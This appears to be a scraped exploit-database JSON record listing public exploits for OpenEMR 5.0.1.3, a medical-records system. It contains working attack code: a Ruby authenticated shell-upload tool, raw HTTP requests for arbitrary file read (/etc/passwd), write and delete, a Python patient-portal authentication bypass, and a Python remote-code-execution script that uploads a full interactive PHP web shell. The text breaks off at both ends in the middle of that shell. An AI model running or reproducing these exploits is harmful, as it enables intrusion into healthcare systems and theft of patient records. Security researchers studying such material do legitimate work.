array('Done.'),\\n 'cwd' => getcwd()\\n );\\n }\\n}\\n\\nif (isset($_GET[\\\"feature\\\"])) {\\n\\n $response = NULL;\\n\\n switch ($_GET[\\\"feature\\\"]) {\\n case \\\"shell\\\":\\n $cmd = $_POST['cmd'];\\n if (!preg_match('/2>/', $cmd)) {\\n $cmd .= ' 2>&1';\\n }\\n $response = featureShell($cmd, $_POST[\\\"cwd\\\"]);\\n break;\\n case \\\"pwd\\\":\\n $response = featurePwd();\\n break;\\n case \\\"hint\\\":\\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\\n break;\\n case 'upload':\\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\\n }\\n\\n header(\\\"Content-Type: application/json\\\");\\n echo json_encode($response);\\n die();\\n}\\n\\n?><!DOCTYPE html>\\n\\n<html>\\n\\n <head>\\n <meta charset=\\\"UTF-8\\\" />\\n <title>p0wny@shell:~#</title>\\n <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\" />\\n <style>\\n html, body {\\n margin: 0;\\n padding: 0;\\n background: #333;\\n color: #eee;\\n font-family: monospace;\\n }\\n\\n *::-webkit-scrollbar-track {\\n border-radius: 8px;\\n background-color: #353535;\\n }\\n\\n *::-webkit-scrollbar {\\n width: 8px;\\n height: 8px;\\n }\\n\\n *::-webkit-scrollbar-thumb {\\n border-radi \n \n# Send Exploit: \nsession.post(exploit_url, headers=header, data=body) \n \n# Finish \npath = 'http://' + target_ip + ':' + target_port + openemr_path + '/sites/default/images/shell.php' \nprint('[+] Webshell: ' + path) \n \n`\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/163110/openemr5013-shell.txt"}, {"lastseen": "2021-07-13T16:00:46", "description": "", "cvss3": {}, "published": "2021-07-13T00:00:00", "type": "packetstorm", "title": "OpenEMR 5.0.1.3 Shell Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-15139", "CVE-2019-14530"], "modified": "2021-07-13T00:00:00", "id": "PACKETSTORM:163482", "href": "https://packetstormsecurity.com/files/163482/OpenEMR-5.0.1.3-Shell-Upload.html", "sourceData": "`# Title: OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2) \n# Exploit author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr) \n# Date: 2021-07-05 \n# Vendor Homepage: https://www.open-emr.org/ \n# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz \n# Docker PoC: https://github.com/sec-it/exploit-CVE-2018-15139/blob/master/docker-compose.yml \n# Version: < 5.0.1.4 (it means up to 5.0.1.3) \n# Tested on: OpenEMR Version 5.0.0.8 \n# References: https://www.exploit-db.com/exploits/49998 \n# CVE: CVE-2018-15139 \n# CWE: CWE-434 \n# Patch: https://github.com/openemr/openemr/pull/1757/commits/c2808a0493243f618bbbb3459af23c7da3dc5485 \n \n#!/usr/bin/env ruby \n \nrequire 'pathname' \nrequire 'httpx' \nrequire 'http/form_data' \nrequire 'docopt' \n \ndoc = <<~DOCOPT \nOpenEMR < 5.0.1.4 - (Authenticated) File upload - Remote command execution \n \nSource: https://github.com/sec-it/exploit-CVE-2019-14530 \n \nUsage: \n#{__FILE__} exploit <url> <filename> <username> <password> [--debug] \n#{__FILE__} -h | --help \n \nOptions: \n<url> Root URL (base path) including HTTP scheme, port and root folder \n<filename> Filename of the shell to be uploaded \n<username> Username of the admin \n<password> Password of the admin \n--debug Display arguments \n-h, --help Show this screen \n \nExamples: \n#{__FILE__} exploit http://example.org/openemr shell.php admin pass \n#{__FILE__} exploit https://example.org:5000/ shell.php admin pass \nDOCOPT \n \ndef login(root_url, user, pass, http) \nvuln_url = \"#{root_url}/interface/main/main_screen.php?auth=login&site=default\" \nparams = { \n'new_login_session_management' => '1', \n'authProvider' => 'Default', \n'authUser' => user, \n'clearPass' => pass, \n'languageChoice' => '1' \n} \n \nhttp.post(vuln_url, form: params).body.to_s \nend \n \ndef upload(root_url, filepath, http) \nvuln_url = \"#{root_url}/interface/super/manage_site_files.php\" \npn = Pathname.new(filepath) \n \nparams = { \nform_image: { \ncontent_type: 'application/x-php', \nfilename: pn.basename.to_s, \nbody: pn \n}, \nbn_save: 'Save' \n} \n \nres = http.post(vuln_url, form: params) \n \nreturn '[-] File not upload' unless (200..299).include?(res.status) \n \n\"[+] File uploaded:\\n#{root_url}/sites/default/images/#{pn.basename}\" \nend \n \nbegin \nargs = Docopt.docopt(doc) \npp args if args['--debug'] \n \nif args['exploit'] \nhttp = HTTPX.plugin(:cookies).plugin(:follow_redirects).plugin(:multipart) \nlogin(args['<url>'], args['<username>'], args['<password>'], http) \nputs upload(args['<url>'], args['<filename>'], http) \nend \nrescue Docopt::Exit => e \nputs e.message \nend \n \n`\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/163482/openemr5013msf-shell.txt"}], "zdt": [{"lastseen": "2018-08-17T18:21:04", "description": "Exploit for linux platform in category web applications", "cvss3": {}, "published": "2018-08-16T00:00:00", "type": "zdt", "title": "OpenEMR 5.0.1.3 - Arbitrary File Actions Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-15141", "CVE-2018-15142", "CVE-2018-15140"], "modified": "2018-08-16T00:00:00", "id": "1337DAY-ID-30893", "href": "https://0day.today/exploit/description/30893", "sourceData": "# Exploit Title: OpenEMR 5.0.1.3 - Arbitrary File Actions \r\n# Exploit Author: Joshua Fam\r\n# Twitter : @Insecurity\r\n# Vendor Homepage: https://www.open-emr.org/\r\n# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz\r\n# Version: < 5.0.1.3 \r\n# Tested on: Ubuntu LAMP, OpenEMR Version 5.0.1.3\r\n# CVE : CVE-2018-15142,CVE-2018-15141,CVE-2018-15140\r\n \r\n# 1.Arbitrary File Read:\r\n# In OpenEmr a user that has access to the portal can send a malcious \r\n# POST request to read arbitrary files.\r\n \r\n# i.Vulnerable Code: \r\n# if ($_POST['mode'] == 'get') {\r\n# echo file_get_contents($_POST['docid']);\r\n# exit;\r\n# }\r\n \r\n# ii. Proof of Concept:\r\nPOST /openemr/portal/import_template.php HTTP/1.1\r\nHost: hostname\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nCookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 26\r\n \r\nmode=get&docid=/etc/passwd\r\n \r\n# 2.Arbitrary File Write:\r\n# In OpenEmr a user that has access to the portal can send a malcious \r\n# POST request to write arbitrary files.\r\n \r\n# i. Vulnerable Code: \r\n# } else if ($_POST['mode'] == 'save') {\r\n# file_put_contents($_POST['docid'], $_POST['content']);\r\n# exit(true);\r\n# }\r\n \r\n# ii. Proof of Concept:\r\nPOST /openemr/portal/import_template.php HTTP/1.1\r\nHost: hostname\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nCookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 54\r\n \r\nmode=save&docid=payload.php&content=<?php phpinfo();?>\r\n \r\n# After sending this navigate to payload.php at http://hostname/openemr/portal\r\n \r\n# 3. Arbitrary File Delete:\r\n# In OpenEmr a user that has access to the portal can send a malcious \r\n# POST request to delete a arbitrary file.\r\n \r\n# i. Vulnerable Code: \r\n# } else if ($_POST['mode'] == 'delete') {\r\n# unlink($_POST['docid']);\r\n# exit(true);\r\n# }\r\n \r\n# ii. Proof of Concept: \r\nPOST /openemr/portal/import_template.php HTTP/1.1\r\nHost: 127.0.0.1\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nCookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 29\r\n \r\nmode=delete&docid=payload.php\r\n \r\n# After completing this request, when you navigate to payload.php, you should be greeted by a 404 page.\n\n# 0day.today [2018-08-17] #", "sourceHref": "https://0day.today/exploit/30893", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-12-04T15:55:59", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.2}, "published": "2021-06-16T00:00:00", "type": "zdt", "title": "OpenEMR 5.0.1.3 - (register) Authentication Bypass Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15152"], "modified": "2021-06-16T00:00:00", "id": "1337DAY-ID-36428", "href": "https://0day.today/exploit/description/36428", "sourceData": "# Exploit Title: OpenEMR 5.0.1.3 - '/portal/account/register.php' Authentication Bypass\n# Exploit Author: Ron Jost (Hacker5preme)\n# Vendor Homepage: https://www.open-emr.org/\n# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_3.zip\n# Version: All versions prior to 5.0.1.4\n# Tested on: Ubuntu 18.04\n# CVE: CVE-2018-15152\n# CWE: CWE-287\n# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-15152-Exploit\n\n'''\nDescription:\nAn unauthenticated user is able to bypass the Patient Portal Login by simply navigating to\nthe registration page and modifying the requested url to access the desired page. Some\nexamples of pages in the portal directory that are accessible after browsing to the\nregistration page include:\n- add_edit_event_user.php\n- find_appt_popup_user.php\n- get_allergies.php\n- get_amendments.php\n- get_lab_results.php\n- get_medications.php\n- get_patient_documents.php\n- get_problems.php\n- get_profile.php\n- portal_payment.php\n- messaging/messages.php\n- messaging/secure_chat.php\n- report/pat_ledger.php\n- report/portal_custom_report.php\n- report/portal_patient_report.php\nNormally, access to these pages requires authentication as a patient. If a user were to visit\nany of those pages unauthenticated, they would be redirected to the login page.\n'''\n\n\n'''\nImport required modules:\n'''\nimport requests\nimport argparse\n\n\n'''\nUser-Input:\n'''\nmy_parser = argparse.ArgumentParser(description='OpenEMR Authentication bypass')\nmy_parser.add_argument('-T', '--IP', type=str)\nmy_parser.add_argument('-P', '--PORT', type=str)\nmy_parser.add_argument('-U', '--Openemrpath', type=str)\nmy_parser.add_argument('-R', '--PathToGet', type=str)\nargs = my_parser.parse_args()\ntarget_ip = args.IP\ntarget_port = args.PORT\nopenemr_path = args.Openemrpath\npathtoread = args.PathToGet\n\n\n'''\nCheck for vulnerability:\n'''\n# Check, if Registration portal is enabled. If it is not, this exploit can not work\nsession = requests.Session()\ncheck_vuln_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/portal/account/register.php'\ncheck_vuln = session.get(check_vuln_url).text\nprint('')\nprint('[*] Checking vulnerability: ')\nprint('')\n\nif \"Enter email address to receive registration.\" in check_vuln:\n print('[+] Host Vulnerable. Proceeding exploit')\nelse:\n print('[-] Host is not Vulnerable: Registration for patients is not enabled')\n\n'''\nExploit:\n'''\nheader = {\n 'Referer': check_vuln_url\n}\nexploit_url = 'http://' + target_ip + ':' + target_port + openemr_path + pathtoread\nExploit = session.get(exploit_url, headers=header)\nprint('')\nprint('[+] Results: ')\nprint('')\nprint(Exploit.text)\nprint('')\n", "sourceHref": "https://0day.today/exploit/36428", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-12-27T13:45:44", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-14T00:00:00", "type": "zdt", "title": "OpenEMR 5.0.1.3 - (manage_site_files) Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15139"], "modified": "2021-06-14T00:00:00", "id": "1337DAY-ID-36407", "href": "https://0day.today/exploit/description/36407", "sourceData": "# Exploit Title: OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated)\n# Exploit Author: Ron Jost (Hacker5preme)\n# Vendor Homepage: https://www.open-emr.org/\n# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_3.zip\n# Version: Prior to 5.0.1.4\n# Tested on: Ubuntu 18.04\n# CVE: CVE-2018-15139\n# CWE: CWE-434\n# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-15139\n\n'''\nDescription:\nUnrestricted file upload in interface/super/manage_site_files.php in versions of OpenEMR before 5.0.1.4 allows a remote\nauthenticated attacker to execute arbitrary PHP code by uploading a file with a PHP extension via the images upload\nform and accessing it in the images directory.\n'''\n\n\n'''\nBanner:\n'''\nbanner =\"\"\"\n ___ _____ __ __ ____ ____ ___ _ _____ \n / _ \\ _ __ ___ _ __ | ____| \\/ | _ \\ | ___| / _ \\ / | |___ / \n | | | | '_ \\ / _ \\ '_ \\| _| | |\\/| | |_) | _____ |___ \\| | | || | |_ \\ \n | |_| | |_) | __/ | | | |___| | | | _ < |_____| ___) | |_| || |_ ___) | \n \\___/| .__/ \\___|_| |_|_____|_| |_|_| \\_\\ |____(_)___(_)_(_)____/ \n |_| \n\n _____ _ _ _ \n | ____|_ ___ __ | | ___ (_) |_ \n | _| \\ \\/ / '_ \\| |/ _ \\| | __|\n | |___ > <| |_) | | (_) | | |_ \n |_____/_/\\_\\ .__/|_|\\___/|_|\\__|\n |_| \n\n\"\"\"\nprint(banner)\n\n\n'''\nImport required modules\n'''\nimport argparse\nimport requests\n\n\n'''\nUser-Input:\n'''\nmy_parser = argparse.ArgumentParser(description='OpenEMR Remote Code Execution')\nmy_parser.add_argument('-T', '--IP', type=str)\nmy_parser.add_argument('-P', '--PORT', type=str)\nmy_parser.add_argument('-U', '--PATH', type=str)\nmy_parser.add_argument('-u', '--USERNAME', type=str)\nmy_parser.add_argument('-p', '--PASSWORD', type=str)\nargs = my_parser.parse_args()\ntarget_ip = args.IP\ntarget_port = args.PORT\nopenemr_path = args.PATH\nusername = args.USERNAME\npassword = args.PASSWORD\n\n'''\nAuthentication:\n'''\n# Preparation:\nsession = requests.Session()\nauth_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/main/main_screen.php?auth=login&site=default'\nauth_chek_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/login/login.php?site=default'\nresponse = session.get(auth_chek_url)\n\n# Header (auth):\nheader = {\n 'Host': target_ip,\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',\n 'Accept-Encoding': 'gzip, deflate',\n 'Content-Type': 'application/x-www-form-urlencoded',\n 'Origin': 'http://' + target_ip,\n 'Connection': 'close',\n 'Referer': auth_chek_url,\n 'Upgrade-Insecure-Requests': '1',\n}\n\n# Body (auth):\nbody = {\n 'new_login_session_management': '1',\n 'authProvider': 'Default',\n 'authUser': username,\n 'clearPass': password,\n 'languageChoice': '1'\n}\n\n# Authentication:\nprint('')\nprint('[+] Authentication')\nauth = session.post(auth_url,headers=header, data=body)\n\n\n'''\nExploit:\n'''\nprint('')\nprint('[+] Uploading Webshell:')\n\n# URL:\nexploit_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/super/manage_site_files.php'\n\n# Headers (Exploit):\nheader = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\",\n \"Accept-Language\": \"de,en-US;q=0.7,en;q=0.3\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Content-Type\": \"multipart/form-data; boundary=---------------------------31900464228840324774249185339\",\n \"Origin\": \"http://\" + target_ip,\n \"Connection\": \"close\",\n \"Referer\": 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/super/manage_site_files.php',\n \"Upgrade-Insecure-Requests\": \"1\"\n}\n\n# Body (Exploit):\nbody = \"-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"form_filename\\\"\\r\\n\\r\\n\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"form_filedata\\\"\\r\\n\\r\\n\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"MAX_FILE_SIZE\\\"\\r\\n\\r\\n12000000\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"form_image\\\"; filename=\\\"shell.php\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n<?php\\n\\nfunction featureShell($cmd, $cwd) {\\n $stdout = array();\\n\\n if (preg_match(\\\"/^\\\\s*cd\\\\s*$/\\\", $cmd)) {\\n // pass\\n } elseif (preg_match(\\\"/^\\\\s*cd\\\\s+(.+)\\\\s*(2>&1)?$/\\\", $cmd)) {\\n chdir($cwd);\\n preg_match(\\\"/^\\\\s*cd\\\\s+([^\\\\s]+)\\\\s*(2>&1)?$/\\\", $cmd, $match);\\n chdir($match[1]);\\n } elseif (preg_match(\\\"/^\\\\s*download\\\\s+[^\\\\s]+\\\\s*(2>&1)?$/\\\", $cmd)) {\\n chdir($cwd);\\n preg_match(\\\"/^\\\\s*download\\\\s+([^\\\\s]+)\\\\s*(2>&1)?$/\\\", $cmd, $match);\\n return featureDownload($match[1]);\\n } else {\\n chdir($cwd);\\n exec($cmd, $stdout);\\n }\\n\\n return array(\\n \\\"stdout\\\" => $stdout,\\n \\\"cwd\\\" => getcwd()\\n );\\n}\\n\\nfunction featurePwd() {\\n return array(\\\"cwd\\\" => getcwd());\\n}\\n\\nfunction featureHint($fileName, $cwd, $type) {\\n chdir($cwd);\\n if ($type == 'cmd') {\\n $cmd = \\\"compgen -c $fileName\\\";\\n } else {\\n $cmd = \\\"compgen -f $fileName\\\";\\n }\\n $cmd = \\\"/bin/bash -c \\\\\\\"$cmd\\\\\\\"\\\";\\n $files = explode(\\\"\\\\n\\\", shell_exec($cmd));\\n return array(\\n 'files' => $files,\\n );\\n}\\n\\nfunction featureDownload($filePath) {\\n $file = @file_get_contents($filePath);\\n if ($file === FALSE) {\\n return array(\\n 'stdout' => array('File not found / no read permission.'),\\n 'cwd' => getcwd()\\n );\\n } else {\\n return array(\\n 'name' => basename($filePath),\\n 'file' => base64_encode($file)\\n );\\n }\\n}\\n\\nfunction featureUpload($path, $file, $cwd) {\\n chdir($cwd);\\n $f = @fopen($path, 'wb');\\n if ($f === FALSE) {\\n return array(\\n 'stdout' => array('Invalid path / no write permission.'),\\n 'cwd' => getcwd()\\n );\\n } else {\\n fwrite($f, base64_decode($file));\\n fclose($f);\\n return array(\\n 'stdout' => array('Done.'),\\n 'cwd' => getcwd()\\n );\\n }\\n}\\n\\nif (isset($_GET[\\\"feature\\\"])) {\\n\\n $response = NULL;\\n\\n switch ($_GET[\\\"feature\\\"]) {\\n case \\\"shell\\\":\\n $cmd = $_POST['cmd'];\\n if (!preg_match('/2>/', $cmd)) {\\n $cmd .= ' 2>&1';\\n }\\n $response = featureShell($cmd, $_POST[\\\"cwd\\\"]);\\n break;\\n case \\\"pwd\\\":\\n $response = featurePwd();\\n break;\\n case \\\"hint\\\":\\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\\n break;\\n case 'upload':\\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\\n }\\n\\n header(\\\"Content-Type: application/json\\\");\\n echo json_encode($response);\\n die();\\n}\\n\\n?><!DOCTYPE html>\\n\\n<html>\\n\\n <head>\\n <meta charset=\\\"UTF-8\\\" />\\n <title>[email\u00a0protected]:~#</title>\\n <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\" />\\n <style>\\n html, body {\\n margin: 0;\\n padding: 0;\\n background: #333;\\n color: #eee;\\n font-family: monospace;\\n }\\n\\n *::-webkit-scrollbar-track {\\n border-radius: 8px;\\n background-color: #353535;\\n }\\n\\n *::-webkit-scrollbar {\\n width: 8px;\\n height: 8px;\\n }\\n\\n *::-webkit-scrollbar-thumb {\\n border-radius: 8px;\\n -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);\\n background-color: #bcbcbc;\\n }\\n\\n #shell {\\n background: #222;\\n max-width: 800px;\\n margin: 50px auto 0 auto;\\n box-shadow: 0 0 5px rgba(0, 0, 0, .3);\\n font-size: 10pt;\\n display: flex;\\n flex-direction: column;\\n align-items: stretch;\\n }\\n\\n #shell-content {\\n height: 500px;\\n overflow: auto;\\n padding: 5px;\\n white-space: pre-wrap;\\n flex-grow: 1;\\n }\\n\\n #shell-logo {\\n font-weight: bold;\\n color: #FF4180;\\n text-align: center;\\n }\\n\\n @media (max-width: 991px) {\\n #shell-logo {\\n font-size: 6px;\\n margin: -25px 0;\\n }\\n\\n html, body, #shell {\\n height: 100%;\\n width: 100%;\\n max-width: none;\\n }\\n\\n #shell {\\n margin-top: 0;\\n }\\n }\\n\\n @media (max-width: 767px) {\\n #shell-input {\\n flex-direction: column;\\n }\\n }\\n\\n @media (max-width: 320px) {\\n #shell-logo {\\n font-size: 5px;\\n }\\n }\\n\\n .shell-prompt {\\n font-weight: bold;\\n color: #75DF0B;\\n }\\n\\n .shell-prompt > span {\\n color: #1BC9E7;\\n }\\n\\n #shell-input {\\n display: flex;\\n box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);\\n border-top: rgba(255, 255, 255, .05) solid 1px;\\n }\\n\\n #shell-input > label {\\n flex-grow: 0;\\n display: block;\\n padding: 0 5px;\\n height: 30px;\\n line-height: 30px;\\n }\\n\\n #shell-input #shell-cmd {\\n height: 30px;\\n line-height: 30px;\\n border: none;\\n background: transparent;\\n color: #eee;\\n font-family: monospace;\\n font-size: 10pt;\\n width: 100%;\\n align-self: center;\\n }\\n\\n #shell-input div {\\n flex-grow: 1;\\n align-items: stretch;\\n }\\n\\n #shell-input input {\\n outline: none;\\n }\\n </style>\\n\\n <script>\\n var CWD = null;\\n var commandHistory = [];\\n var historyPosition = 0;\\n var eShellCmdInput = null;\\n var eShellContent = null;\\n\\n function _insertCommand(command) {\\n eShellContent.innerHTML += \\\"\\\\n\\\\n\\\";\\n eShellContent.innerHTML += '<span class=\\\\\\\"shell-prompt\\\\\\\">' + genPrompt(CWD) + '</span> ';\\n eShellContent.innerHTML += escapeHtml(command);\\n eShellContent.innerHTML += \\\"\\\\n\\\";\\n eShellContent.scrollTop = eShellContent.scrollHeight;\\n }\\n\\n function _insertStdout(stdout) {\\n eShellContent.innerHTML += escapeHtml(stdout);\\n eShellContent.scrollTop = eShellContent.scrollHeight;\\n }\\n\\n function _defer(callback) {\\n setTimeout(callback, 0);\\n }\\n\\n function featureShell(command) {\\n\\n _insertCommand(command);\\n if (/^\\\\s*upload\\\\s+[^\\\\s]+\\\\s*$/.test(command)) {\\n featureUpload(command.match(/^\\\\s*upload\\\\s+([^\\\\s]+)\\\\s*$/)[1]);\\n } else if (/^\\\\s*clear\\\\s*$/.test(command)) {\\n // Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer\\n eShellContent.innerHTML = '';\\n } else {\\n makeRequest(\\\"?feature=shell\\\", {cmd: command, cwd: CWD}, function (response) {\\n if (response.hasOwnProperty('file')) {\\n featureDownload(response.name, response.file)\\n } else {\\n _insertStdout(response.stdout.join(\\\"\\\\n\\\"));\\n updateCwd(response.cwd);\\n }\\n });\\n }\\n }\\n\\n function featureHint() {\\n if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete\\n\\n function _requestCallback(data) {\\n if (data.files.length <= 1) return; // no completion\\n\\n if (data.files.length === 2) {\\n if (type === 'cmd') {\\n eShellCmdInput.value = data.files[0];\\n } else {\\n var currentValue = eShellCmdInput.value;\\n eShellCmdInput.value = currentValue.replace(/([^\\\\s]*)$/, data.files[0]);\\n }\\n } else {\\n _insertCommand(eShellCmdInput.value);\\n _insertStdout(data.files.join(\\\"\\\\n\\\"));\\n }\\n }\\n\\n var currentCmd = eShellCmdInput.value.split(\\\" \\\");\\n var type = (currentCmd.length === 1) ? \\\"cmd\\\" : \\\"file\\\";\\n var fileName = (type === \\\"cmd\\\") ? currentCmd[0] : currentCmd[currentCmd.length - 1];\\n\\n makeRequest(\\n \\\"?feature=hint\\\",\\n {\\n filename: fileName,\\n cwd: CWD,\\n type: type\\n },\\n _requestCallback\\n );\\n\\n }\\n\\n function featureDownload(name, file) {\\n var element = document.createElement('a');\\n element.setAttribute('href', 'data:application/octet-stream;base64,' + file);\\n element.setAttribute('download', name);\\n element.style.display = 'none';\\n document.body.appendChild(element);\\n element.click();\\n document.body.removeChild(element);\\n _insertStdout('Done.');\\n }\\n\\n function featureUpload(path) {\\n var element = document.createElement('input');\\n element.setAttribute('type', 'file');\\n element.style.display = 'none';\\n document.body.appendChild(element);\\n element.addEventListener('change', function () {\\n var promise = getBase64(element.files[0]);\\n promise.then(function (file) {\\n makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {\\n _insertStdout(response.stdout.join(\\\"\\\\n\\\"));\\n updateCwd(response.cwd);\\n });\\n }, function () {\\n _insertStdout('An unknown client-side error occurred.');\\n });\\n });\\n element.click();\\n document.body.removeChild(element);\\n }\\n\\n function getBase64(file, onLoadCallback) {\\n return new Promise(function(resolve, reject) {\\n var reader = new FileReader();\\n reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };\\n reader.onerror = reject;\\n reader.readAsDataURL(file);\\n });\\n }\\n\\n function genPrompt(cwd) {\\n cwd = cwd || \\\"~\\\";\\n var shortCwd = cwd;\\n if (cwd.split(\\\"/\\\").length > 3) {\\n var splittedCwd = cwd.split(\\\"/\\\");\\n shortCwd = \\\"\\xe2\\x80\\xa6/\\\" + splittedCwd[splittedCwd.length-2] + \\\"/\\\" + splittedCwd[splittedCwd.length-1];\\n }\\n return \\\"[email\u00a0protected]:<span title=\\\\\\\"\\\" + cwd + \\\"\\\\\\\">\\\" + shortCwd + \\\"</span>#\\\";\\n }\\n\\n function updateCwd(cwd) {\\n if (cwd) {\\n CWD = cwd;\\n _updatePrompt();\\n return;\\n }\\n makeRequest(\\\"?feature=pwd\\\", {}, function(response) {\\n CWD = response.cwd;\\n _updatePrompt();\\n });\\n\\n }\\n\\n function escapeHtml(string) {\\n return string\\n .replace(/&/g, \\\"&\\\")\\n .replace(/</g, \\\"<\\\")\\n .replace(/>/g, \\\">\\\");\\n }\\n\\n function _updatePrompt() {\\n var eShellPrompt = document.getElementById(\\\"shell-prompt\\\");\\n eShellPrompt.innerHTML = genPrompt(CWD);\\n }\\n\\n function _onShellCmdKeyDown(event) {\\n switch (event.key) {\\n case \\\"Enter\\\":\\n featureShell(eShellCmdInput.value);\\n insertToHistory(eShellCmdInput.value);\\n eShellCmdInput.value = \\\"\\\";\\n break;\\n case \\\"ArrowUp\\\":\\n if (historyPosition > 0) {\\n 